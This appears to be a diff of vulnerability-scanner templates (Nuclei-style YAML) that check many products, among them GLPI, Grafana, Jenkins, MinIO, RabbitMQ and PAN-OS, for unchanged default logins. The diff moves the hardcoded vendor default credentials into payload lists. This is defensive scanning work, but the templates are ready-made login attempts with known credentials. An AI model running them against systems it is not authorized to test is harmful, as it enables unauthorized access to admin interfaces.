matchers:
|
matchers:
|
||||||
|
|
|
@ -14,7 +14,14 @@ requests:
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
user_name=admin&user_password=admin
|
user_name={{username}}&user_password={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -8,11 +8,18 @@ info:
|
||||||
reference: https://github.com/fatedier/frp/issues/1840
|
reference: https://github.com/fatedier/frp/issues/1840
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/api/proxy/tcp"
|
GET /api/proxy/tcp HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Authorization: "Basic YWRtaW46YWRtaW4="
|
Authorization: Basic {{base64(username + ':' + password)}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -17,13 +17,13 @@ requests:
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
content-type: application/json
|
content-type: application/json
|
||||||
|
|
||||||
{"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"}
|
{"grant_type":"password","username":"{{username}}","password":"{{password}}"}
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
gitlab_password:
|
password:
|
||||||
- 12345
|
- 12345
|
||||||
- 123456789
|
- 123456789
|
||||||
gitlab_user:
|
username:
|
||||||
- 1234
|
- 1234
|
||||||
- admin
|
- admin
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
id: glpi-default-login
|
id: glpi-default-login
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: GLPI Default Login
|
name: GLPI Default Login
|
||||||
author: andysvints
|
author: andysvints
|
||||||
|
@ -20,10 +21,14 @@ requests:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
|
|
||||||
{{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}
|
{{name}}={{user}}&{{password}}={{pass}}&auth=local&submit=Submit&_glpi_csrf_token={{token}}
|
||||||
|
|
||||||
cookie-reuse: true
|
attack: pitchfork
|
||||||
redirects: true
|
payloads:
|
||||||
|
user:
|
||||||
|
- glpi
|
||||||
|
pass:
|
||||||
|
- glpi
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
@ -50,11 +55,13 @@ requests:
|
||||||
regex:
|
regex:
|
||||||
- "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\""
|
- "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\""
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- '<title>GLPI - Standard Interface</title>'
|
- '<title>GLPI - Standard Interface</title>'
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -19,15 +19,17 @@ requests:
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
content-type: application/json
|
content-type: application/json
|
||||||
|
|
||||||
{"user":"admin","password":"§grafana_password§"}
|
{"user":"{{username}}","password":"{{password}}"}
|
||||||
|
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
payloads:
|
payloads:
|
||||||
grafana_password:
|
username:
|
||||||
- prom-operator
|
- admin
|
||||||
- admin
|
- admin
|
||||||
|
|
||||||
attack: sniper
|
password:
|
||||||
|
- prom-operator
|
||||||
|
- admin
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -16,7 +16,14 @@ requests:
|
||||||
Origin: {{Hostname}}
|
Origin: {{Hostname}}
|
||||||
Referer: {{Hostname}}
|
Referer: {{Hostname}}
|
||||||
|
|
||||||
username=guacadmin&password=guacadmin
|
username={{username}}&password={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- guacadmin
|
||||||
|
password:
|
||||||
|
- guacadmin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -11,17 +11,26 @@ requests:
|
||||||
- |
|
- |
|
||||||
GET / HTTP/1.1
|
GET / HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
Authorization: Basic {{base64(username + ':' + password)}}
|
||||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
Accept-Encoding: gzip, deflate
|
Accept-Encoding: gzip, deflate
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET / HTTP/1.1
|
GET / HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Authorization: Basic YWRtaW46YWRtaW4=
|
Authorization: Basic {{base64(username + ':' + password)}}
|
||||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
Accept-Encoding: gzip, deflate
|
Accept-Encoding: gzip, deflate
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- guest
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- guest
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
|
|
@ -9,11 +9,18 @@ info:
|
||||||
tags: hortonworks,smartsense,default-login
|
tags: hortonworks,smartsense,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- '{{BaseURL}}/apt/v1/context'
|
GET /apt/v1/context HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Authorization: Basic YWRtaW46YWRtaW4=
|
Authorization: Basic {{base64(username + ':' + password)}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -14,7 +14,13 @@ requests:
|
||||||
POST /htdocs/login/login.lua HTTP/1.1
|
POST /htdocs/login/login.lua HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
username=admin&password=
|
username={{username}}&password=
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
|
||||||
|
attack: sniper
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -14,7 +14,14 @@ requests:
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
j_username=admin&j_password=admin&continue=&submit=submit+form
|
j_username={{username}}&j_password={{password}}&continue=&submit=submit+form
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -9,11 +9,17 @@ info:
|
||||||
tags: idemia,biometrics,default-login
|
tags: idemia,biometrics,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- '{{BaseURL}}/cgi-bin/login.cgi'
|
POST /cgi-bin/login.cgi HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
body: password=12345
|
password={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
password:
|
||||||
|
- 12345
|
||||||
|
attack: sniper
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -13,7 +13,14 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Referer: {{BaseURL}}/sess-bin/login_session.cgi
|
Referer: {{BaseURL}}/sess-bin/login_session.cgi
|
||||||
|
|
||||||
username=admin&passwd=admin
|
username={{username}}&passwd={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -18,21 +18,22 @@ requests:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Cookie: {{cookie}}
|
Cookie: {{cookie}}
|
||||||
|
|
||||||
j_username=admin&j_password=admin&from=%2F&Submit=Sign+in
|
j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in
|
||||||
|
|
||||||
- |
|
|
||||||
POST /j_spring_security_check HTTP/1.1
|
|
||||||
Host: {{Hostname}}
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
|
||||||
Cookie: {{cookie}}
|
|
||||||
|
|
||||||
j_username=jenkins&j_password=password&from=%2F&Submit=Sign+in
|
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET / HTTP/1.1
|
GET / HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Cookie: {{cookie}}
|
Cookie: {{cookie}}
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
- jenkins
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
- password
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
name: cookie
|
name: cookie
|
||||||
|
@ -44,7 +45,7 @@ requests:
|
||||||
req-condition: true
|
req-condition: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
condition: and
|
||||||
dsl:
|
dsl:
|
||||||
- 'contains(body_4, "/logout")'
|
- 'contains(body_3, "/logout")'
|
||||||
- 'contains(body_4, "Dashboard [Jenkins]")'
|
- 'contains(body_3, "Dashboard [Jenkins]")'
|
||||||
condition: and
|
|
||||||
|
|
|
@ -7,23 +7,20 @@ info:
|
||||||
tags: default-login,minio
|
tags: default-login,minio
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/minio/webrpc"
|
POST /minio/webrpc HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
headers:
|
{"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"Web.Login"}
|
||||||
Content-Type: application/json
|
|
||||||
|
|
||||||
body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
|
payloads:
|
||||||
|
username:
|
||||||
- method: POST
|
- minioadmin
|
||||||
path:
|
password:
|
||||||
- "{{BaseURL}}/minio/webrpc"
|
- minioadmin
|
||||||
|
attack: pitchfork
|
||||||
headers:
|
|
||||||
Content-Type: application/json
|
|
||||||
|
|
||||||
body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -6,17 +6,27 @@ info:
|
||||||
tags: nagios,default-login
|
tags: nagios,default-login
|
||||||
reference: https://www.nagios.org
|
reference: https://www.nagios.org
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/nagios/side.php"
|
GET /nagios/side.php HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Authorization: Basic bmFnaW9zYWRtaW46bmFnaW9zYWRtaW4=
|
Authorization: Basic {{base64(username + ':' + password)}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- nagiosadmin
|
||||||
|
- root
|
||||||
|
password:
|
||||||
|
- nagiosadmin
|
||||||
|
- nagiosxi
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- 'Current Status'
|
- 'Current Status'
|
||||||
|
|
|
@ -14,7 +14,14 @@ requests:
|
||||||
X-Nexus-UI: true
|
X-Nexus-UI: true
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
|
username={{base64(username)}}&password={{base64(password)}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin123
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -7,13 +7,21 @@ info:
|
||||||
tags: nps,default-login
|
tags: nps,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/login/verify"
|
POST /login/verify HTTP/1.1
|
||||||
body: "username=admin&password=123"
|
Host: {{Hostname}}
|
||||||
headers:
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Referer: {{Hostname}}/login/index
|
||||||
Referer: "{{Hostname}}/login/index"
|
|
||||||
|
username={{username}}&password={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- 123
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -7,12 +7,21 @@ info:
|
||||||
tags: ofbiz,default-login
|
tags: ofbiz,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- '{{BaseURL}}/control/login'
|
POST /control/login HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
body: USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
|
|
||||||
|
USERNAME={{username}}&PASSWORD={{password}}&FTOKEN=&JavaScriptEnabled=Y
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- ofbiz
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
|
|
|
@ -19,13 +19,20 @@ requests:
|
||||||
<soapenv:Header/>
|
<soapenv:Header/>
|
||||||
<soapenv:Body>
|
<soapenv:Body>
|
||||||
<rep:createSession soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
|
<rep:createSession soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
|
||||||
<username xsi:type="xsd:string">Administrator</username>
|
<username xsi:type="xsd:string">{{username}}</username>
|
||||||
<password xsi:type="xsd:string">Administrator</password>
|
<password xsi:type="xsd:string">{{password}}</password>
|
||||||
<domain xsi:type="xsd:string">bi</domain>
|
<domain xsi:type="xsd:string">bi</domain>
|
||||||
</rep:createSession>
|
</rep:createSession>
|
||||||
</soapenv:Body>
|
</soapenv:Body>
|
||||||
</soapenv:Envelope>
|
</soapenv:Envelope>
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- Administrator
|
||||||
|
password:
|
||||||
|
- Administrator
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -9,11 +9,20 @@ info:
|
||||||
tags: paloalto,panos,default-login
|
tags: paloalto,panos,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- '{{BaseURL}}/php/login.php'
|
POST /php/login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
body: user=admin&passwd=admin&challengePwd=&ok=Login
|
user={{username}}&passwd={{password}}&challengePwd=&ok=Login
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -19,15 +19,22 @@ requests:
|
||||||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
||||||
|
|
||||||
------WebKitFormBoundaryAjZMsILtbrBp8VbC
|
------WebKitFormBoundaryAjZMsILtbrBp8VbC
|
||||||
Content-Disposition: form-data; name="username"
|
Content-Disposition: form-data; name="{{username}}"
|
||||||
|
|
||||||
admin
|
admin
|
||||||
------WebKitFormBoundaryAjZMsILtbrBp8VbC
|
------WebKitFormBoundaryAjZMsILtbrBp8VbC
|
||||||
Content-Disposition: form-data; name="password"
|
Content-Disposition: form-data; name="{{password}}"
|
||||||
|
|
||||||
panabit
|
panabit
|
||||||
------WebKitFormBoundaryAjZMsILtbrBp8VbC--
|
------WebKitFormBoundaryAjZMsILtbrBp8VbC--
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- username
|
||||||
|
password:
|
||||||
|
- password
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
|
|
@ -7,11 +7,20 @@ info:
|
||||||
tags: rabbitmq,default-login
|
tags: rabbitmq,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/api/whoami"
|
GET /api/whoami HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Authorization: "Basic Z3Vlc3Q6Z3Vlc3Q="
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Authorization: Basic {{base64(username + ':' + password)}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- guest
|
||||||
|
password:
|
||||||
|
- guest
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
|
|
@ -14,7 +14,12 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Cookie: cookieOnOffChecker=on;
|
Cookie: cookieOnOffChecker=on;
|
||||||
|
|
||||||
wimToken=&userid_work=&userid=YWRtaW4%3D&password_work=&password=&open=
|
wimToken=&userid_work=&userid={{base64(username)}}&password_work=&password=&open=
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -14,7 +14,14 @@ requests:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Referer: {{Hostname}}/index.php?action=login.index
|
Referer: {{Hostname}}/index.php?action=login.index
|
||||||
|
|
||||||
more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3
|
more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -8,18 +8,28 @@ info:
|
||||||
tags: samsung,default-login
|
tags: samsung,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/main.ehp"
|
POST /main.ehp HTTP/1.1
|
||||||
body: "httpd;General;lang=en&login_id=root&login_pw=sweap12~"
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
httpd;General;lang=en&login_id={{username}}&login_pw={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- root
|
||||||
|
password:
|
||||||
|
- sweap12~
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- "document.formParent2.changepasswd1.value"
|
- "document.formParent2.changepasswd1.value"
|
||||||
- "passwd_change.ehp"
|
- "passwd_change.ehp"
|
||||||
part: body
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -9,14 +9,21 @@ info:
|
||||||
tags: showdoc,default-login
|
tags: showdoc,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/server/index.php?s=/api/user/login"
|
POST /server/index.php?s=/api/user/login HTTP/1.1
|
||||||
body: |
|
Host: {{Hostname}}
|
||||||
username=showdoc&password=123456&v_code=
|
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&v_code=
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- showdoc
|
||||||
|
password:
|
||||||
|
- 123456
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
headers:
|
|
||||||
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
|
|
|
@ -12,12 +12,22 @@ info:
|
||||||
# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337}
|
# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337}
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS" # First path is default base path
|
GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
|
||||||
- "{{BaseURL}}/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS"
|
Host: {{Hostname}}
|
||||||
headers:
|
Authorization: Basic {{base64(username)}}
|
||||||
Authorization: "Basic YWRtaW46"
|
|
||||||
|
- |
|
||||||
|
GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Authorization: Basic {{base64(username)}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
|
|
@ -13,7 +13,14 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123
|
data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D={{username}}&data%5BUser%5D%5Bpassword%5D={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- spadmin
|
||||||
|
password:
|
||||||
|
- admin123
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -9,13 +9,20 @@ info:
|
||||||
- https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage
|
- https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/login/"
|
POST /login/ HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
body: |
|
|
||||||
email=springbird@qq.com&password=springbird&remeber=true
|
email={{username}}&password={{password}}&remeber=true
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- springbird@qq.com
|
||||||
|
password:
|
||||||
|
- springbird
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -24,7 +24,14 @@ requests:
|
||||||
Referer: {{RootURL}}/super/login.html?lang=en
|
Referer: {{RootURL}}/super/login.html?lang=en
|
||||||
Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en
|
Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en
|
||||||
|
|
||||||
username=super&password=password
|
username={{username}}&password={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- super
|
||||||
|
password:
|
||||||
|
- password
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
|
|
@ -16,7 +16,14 @@ requests:
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
Cookie: trilithic_win_auth=false
|
Cookie: trilithic_win_auth=false
|
||||||
|
|
||||||
{u:"admin", t:"undefined", p:"trilithic", d:"", r:false, w:false}
|
{u:"{{username}}", t:"undefined", p:"{{password}}", d:"", r:false, w:false}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- trilithic
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -9,11 +9,18 @@ info:
|
||||||
reference: https://www.qognify.com/products/visionhub/
|
reference: https://www.qognify.com/products/visionhub/
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- '{{BaseURL}}/VisionHubWebApi/api/Login'
|
POST /VisionHubWebApi/api/Login HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Authorization: Basic YWRtaW46YWRtaW4=
|
Authorization: Basic {{base64(username + ':' + password)}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
